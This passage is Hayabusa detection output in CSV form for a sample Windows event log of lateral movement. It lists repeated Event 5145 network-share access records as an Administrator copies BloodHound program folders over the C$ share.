Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ 
: Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : 
IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 